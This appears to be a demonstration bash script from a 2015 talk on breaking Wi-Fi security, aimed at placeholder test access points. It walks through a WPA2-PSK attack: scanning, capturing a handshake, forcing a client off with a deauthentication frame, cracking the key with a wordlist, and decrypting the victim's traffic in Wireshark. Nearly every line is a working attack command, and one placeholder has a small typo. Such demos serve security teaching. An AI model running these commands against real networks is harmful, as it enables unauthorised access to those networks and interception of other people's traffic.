#!/bin/bash

## Another way to scan the airwaves
ifconfig wlan0 up
iwlist wlan0 scanning

## Listen for a handshake (Deauth as necessary)
airodump-ng mon0 --bssid <Test AP> --channel 6 --write /root/Desktop/2015-07-07\ -\ Pittsburgh\ Code\ and\ Supply\ -\ Breaking\ Wireless\:\ \ The\ Dos\ and\ Don\'ts\ of\ Wi-Fi/WPA2-PSK_Demo
aireplay-ng -0 1 -a <Test AP> -c <Test Client) mon0

## Crack the handshake
aircrack-ng /root/Desktop/2015-07-07\ -\ Pittsburgh\ Code\ and\ Supply\ -\ Breaking\ Wireless\:\ \ The\ Dos\ and\ Don\'ts\ of\ Wi-Fi/WPA2-PSK_Demo -w /usr/share/wordlists/fasttrack.txt

## Watch their traffic
wireshark
# Edit > Preferences > Protocols > IEEE 802.11.  Check Enable Decryption, Add a decryption key.  WPA-PWD is $Password:$SSID (Wildcard SSIDs are an option), where WPA-PSK is the raw key
# Enter a filter to show specific traffic
http.host matches "google\.com$"
ip.dst_host eq www.google.com

## Cleanup
rm /root/Desktop/2015-07-07\ -\ Pittsburgh\ Code\ and\ Supply\ -\ Breaking\ Wireless\:\ \ The\ Dos\ and\ Don\'ts\ of\ Wi-Fi/WPA2-PSK_Demo
